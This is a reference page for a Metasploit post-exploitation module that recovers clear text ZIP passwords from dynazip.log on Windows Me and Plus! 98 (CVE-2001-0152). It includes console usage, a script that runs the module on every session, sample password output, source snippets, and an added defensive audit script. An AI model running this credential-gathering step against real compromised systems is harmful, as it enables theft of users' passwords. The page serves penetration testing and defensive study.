Windows Gather DynaZIP Saved Password Extraction - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/dynazip_log Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Source code: modules/post/windows/gather/credentials/dynazip_log.rb
Disclosure date: 2001-03-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2001-0152
This module extracts clear text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/dynazip_log
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/dynazip_log
msf post(dynazip_log) > show options
... show and set options ...
msf post(dynazip_log) > set SESSION session-id
msf post(dynazip_log) > exploit
If you wish to run the post module against all sessions from the framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/dynazip_log")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This post-exploitation module extracts clear text credentials from dynazip.log.
The dynazip.log file is located in %WINDIR% and contains log entries generated during encryption of Compressed Folders (zip files) in Microsoft® Plus! 98 and Windows® Me. Each log entry contains detailed diagnostic information generated during the encryption process, including the zip file name and the password used to encrypt the zip file in clear text.
Microsoft released details of the vulnerability in Microsoft Security Bulletin MS01-019, rated as Critical. A patch which disabled use of the log file was also released; however, the patch failed to clear the contents of the existing log file.
Microsoft® Plus! 98 and Windows® Me are no longer supported by Microsoft.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do: use post/windows/gather/credentials/dynazip_log
- Do: set SESSION <session id>
- Do: run
- You should be able to see the extracted credentials in the module output
Example Run
Default Output
msf post(dynazip_log) > exploit
[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
ZIP Passwords
=============
File Path Password
--------- --------
C:\WINDOWS\Desktop\earthbound.zip fuzzy pickles
C:\WINDOWS\Desktop\private.zip priv8
C:\WINDOWS\Desktop\secret.zip my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip
[*] Post module execution completed
Verbose Output
msf post(dynazip_log) > set verbose true
verbose => true
msf post(dynazip_log) > exploit
[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[*] Processing log file (6614 bytes)
[*] Processing log entry for C:\WINDOWS\Desktop\secret.zip
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[*] Processing log entry for C:\WINDOWS\Desktop\private.zip
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[*] Processing log entry for C:\WINDOWS\Desktop\thepasswordisaspace.zip
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[*] Processing log entry for C:\WINDOWS\Desktop\earthbound.zip
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
[*] Processing log entry for C:\WINDOWS\Desktop\this file is not encrypted.zip
[*] Did not find a password
ZIP Passwords
=============
File Path Password
--------- --------
C:\WINDOWS\Desktop\earthbound.zip fuzzy pickles
C:\WINDOWS\Desktop\private.zip priv8
C:\WINDOWS\Desktop\secret.zip my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip
[*] Post module execution completed
Example Log Entry
An example dynazip.log log file entry is shown below:
--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17 17:01:46 ---
Function: 5
lpszZIPFile: 0x00437538
C:\WINDOWS\Desktop\secret.zip
lpszItemList: 0x0059e878
"secret.txt"
lpMajorStatus: 0x00000000
lpMajorUserData: 0x00000000
lpMinorStatus: 0x00000000
lpMinorUserData: 0x00000000
dosifyFlag: 0
recurseFlag: 0
compFactor: 5
quietFlag: 1
pathForTempFlag: 0
lpszTempPath: 0x00000000
???
fixFlag: 0
fixHarderFlag: 0
includeVolumeFlag: 0
deleteOriginalFlag: 0
growExistingFlag: 0
noDirectoryNamesFlag: 0
convertLFtoCRLFFlag: 0
addCommentFlag: 0
lpszComment: 0x00000000
???
afterDateFlag: 0
lpszDate: 0x00000000
oldAsLatestFlag: 0
includeOnlyFollowingFlag: 0
lpszIncludeFollowing: 0x00000000
???
excludeFollowingFlag: 0
lpszExludeFollowing: 0x00000000
???
noDirectoryEntriesFlag: 0
includeSysHiddenFlag: 1
dontCompressTheseSuffixesFlag: 0
lpszStoreSuffixes: 0x00000000
???
encryptFlag: 1
lpszEncryptCode: 0x712185d4
my secret password!
lpMessageDisplay: 0x7120ca22
lpMessageDisplayData: 0x00000000
wMultiVolControl: 0x0000
wZipSubOptions: 0x0000
lResv1: 0x00000000
lResv2: 0x00000000
lpszExtProgTitle: 0x00000000
???
lpRenameProc: 0x71203919
lpRenameUserData: 0x0059eb8a
lpMemBlock: 0x004e3a0c
lMemBlockSize: 6
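To turn the entry layout shown above into a defensive check, here is an added Ruby example (not the module's own code) that audits a dynazip.log for entries which recorded a clear text password, so the log can be securely deleted and the listed archives treated as compromised. It assumes the field order shown above; the sample log is constructed and the password is never copied out, only its presence.

```ruby
# Added example, not the Metasploit module's code: audit a dynazip.log for
# entries that recorded a clear text ZIP password. Assumes the entry layout
# shown on this page (a pointer line followed by the dereferenced value).
ENTRY_HEADER = '--- DynaZIP ZIP Diagnostic Log'
NULL_PTR = '0x00000000'

# Returns one hash per log entry: { zip: path, exposed: true/false }.
# The password itself is never returned, only whether one is present.
def audit_dynazip_log(text)
  # chomp strips CR/LF only, so a single-space password (see the example run) survives
  lines = text.each_line.map(&:chomp)
  results = []
  entry = nil
  lines.each_with_index do |line, i|
    if line.start_with?(ENTRY_HEADER)
      results << entry if entry
      entry = { zip: nil, exposed: false }
    elsif entry.nil?
      next                                  # junk before the first entry header
    elsif line.start_with?('lpszZIPFile:')
      entry[:zip] = lines[i + 1].to_s       # the path follows the pointer line
    elsif line.start_with?('lpszEncryptCode:')
      # A null pointer is logged as "???" on the next line; a non-null pointer to
      # a blank password (archive not encrypted) is logged as an empty line.
      next if line.end_with?(NULL_PTR)
      entry[:exposed] = !lines[i + 1].to_s.empty?
    end
  end
  results << entry if entry
  results
end

# Paths of archives whose password is recoverable from the log.
def exposed_zips(text)
  audit_dynazip_log(text).select { |e| e[:exposed] }.map { |e| e[:zip] }
end

# Constructed sample holding only the fields the audit reads, CRLF line endings.
SAMPLE_LOG = [
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17 17:01:46 ---',
  'lpszZIPFile: 0x00437538', 'C:\WINDOWS\Desktop\secret.zip',
  'encryptFlag: 1', 'lpszEncryptCode: 0x712185d4', 'my secret password!',
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17 17:02:03 ---',
  'lpszZIPFile: 0x00437538', 'C:\WINDOWS\Desktop\thepasswordisaspace.zip',
  'encryptFlag: 1', 'lpszEncryptCode: 0x712185d4', ' ',
  '--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17 17:02:41 ---',
  'lpszZIPFile: 0x00437538', 'C:\WINDOWS\Desktop\this file is not encrypted.zip',
  'encryptFlag: 1', 'lpszEncryptCode: 0x712185d4', ''
].join("\r\n") + "\r\n"

puts exposed_zips(SAMPLE_LOG) if __FILE__ == $PROGRAM_NAME
```

Run it against a copy of a real %WINDIR%\dynazip.log with `File.read` to list the archives that need re-encryption before the log is removed.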
Msfconsole Usage
Here is how the windows/gather/credentials/dynazip_log post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/dynazip_log
msf6 post(windows/gather/credentials/dynazip_log) > show info
Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Platform: Windows
Arch:
Rank: Normal
Disclosed: 2001-03-27
Provided by:
bcoles <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module extracts clear text credentials from dynazip.log. The
log file contains passwords used to encrypt compressed zip files in
Microsoft Plus! 98 and Windows Me.
References:
https://nvd.nist.gov/vuln/detail/CVE-2001-0152
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/MS01-019
https://packetstormsecurity.com/files/24543
https://support.microsoft.com/en-us/kb/265131
Module Options
This is a complete list of options available in the windows/gather/credentials/dynazip_log post exploitation module:
msf6 post(windows/gather/credentials/dynazip_log) > show options
Module options (post/windows/gather/credentials/dynazip_log):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/dynazip_log post exploitation module:
msf6 post(windows/gather/credentials/dynazip_log) > show advanced
Module advanced options (post/windows/gather/credentials/dynazip_log):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/dynazip_log module can do:
msf6 post(windows/gather/credentials/dynazip_log) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/dynazip_log post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/dynazip_log) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages.
Check the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<LOG_PATH> not found
Here is a relevant code snippet related to the "<LOG_PATH> not found" error message:
creds = []

log_path = "#{get_env("%WINDIR%")}\\dynazip.log"

unless file?(log_path)
  print_error("#{log_path} not found")
  return
end

print_good("Found DynaZip log file: #{log_path}")

Log file is empty
Here is a relevant code snippet related to the "Log file is empty" error message:
print_good("Found DynaZip log file: #{log_path}")

begin
  log_data = read_file(log_path)
rescue EOFError
  print_error('Log file is empty')
  return
end

vprint_status("Processing log file (#{log_data.length} bytes)")

Did not find a password
Here is a relevant code snippet related to the "Did not find a password" error message:

# In the event that the user selected a blank encryption password
# the ZIP file is not encrypted, however an empty line is written
# to the log file.
if passwd.to_s.eql?('')
  vprint_status('Did not find a password')
  next
end

print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
creds << [zip_path, passwd]
No passwords were found in the log file
Here is a relevant code snippet related to the "No passwords were found in the log file" error message:
print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
creds << [zip_path, passwd]
end

if creds.empty?
  print_error('No passwords were found in the log file')
  return
end

table = Rex::Text::Table.new(
  'Header' => 'ZIP Passwords',
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11234 Merged Pull Request: revisionism
- #7994 Merged Pull Request: Add Windows Gather DynaZIP Saved Password Extraction post module
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.